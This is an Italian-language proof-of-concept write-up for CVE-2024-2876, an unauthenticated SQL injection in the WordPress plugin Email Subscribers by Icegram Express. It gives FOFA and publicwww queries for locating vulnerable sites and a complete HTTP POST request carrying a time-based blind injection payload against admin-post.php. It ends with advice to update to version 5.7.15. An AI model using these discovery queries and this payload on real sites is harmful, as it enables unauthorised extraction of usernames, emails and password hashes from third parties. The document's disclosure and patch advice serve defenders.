
Proof-of-concept exploit per CVE-2024-2876, una SQL injection critica nel plugin WordPress Email Subscribers by Icegram Express, che consente ad attaccanti non autenticati di eseguire query SQL arbitrarie.
CVE-2024-2876 è una vulnerabilità di sicurezza critica trovata nel plugin "Email Subscribers by Icegram Express" per WordPress. Questa vulnerabilità interessa le versioni fino alla 5.7.14 inclusa e comporta rischi significativi per oltre 90.000 siti web.
La vulnerabilità è un difetto di SQL injection che consente ad attaccanti non autenticati di eseguire query SQL dannose sui database WordPress interessati. Manipolando gli input utente che non vengono adeguatamente sanificati, gli attaccanti possono estrarre informazioni sensibili come nomi utente, indirizzi email, hash delle password ed elenchi di iscritti.
La SQL injection si verifica all'interno della funzione run della classe del plugin, dove una validazione inadeguata degli input porta all'esecuzione non autorizzata di codice SQL. Ciò compromette l'integrità e la riservatezza dei dati memorizzati nel database WordPress.
IG_ES_Subscribers_QueryFOFA : body="/wp-content/plugins/email-subscribers/"
publicwww : "/wp-content/plugins/email-subscribers/"
POST /wp-admin/admin-post.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
page=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111
Aggiornamento Immediato: Se stai utilizzando il plugin "Email Subscribers by Icegram Express", aggiorna alla versione 5.7.15 o successiva immediatamente per applicare la correzione di sicurezza.
Audit Regolari: Controlla e aggiorna regolarmente tutti i plugin e i temi WordPress alle loro versioni più recenti per garantire la sicurezza.
Plugin di Sicurezza: Utilizza plugin di sicurezza WordPress affidabili per rafforzare le difese contro SQL injection e altre minacce informatiche.
Politiche per Password Forti: Implementa password forti e uniche per tutti gli account legati al tuo sito WordPress per ridurre i rischi di accesso non autorizzato.
La mancata correzione del plugin interessato può lasciare i siti web vulnerabili a violazioni dei dati e accessi non autorizzati. Data l'ampia diffusione di questo plugin, un'azione immediata è fondamentale per proteggere le installazioni.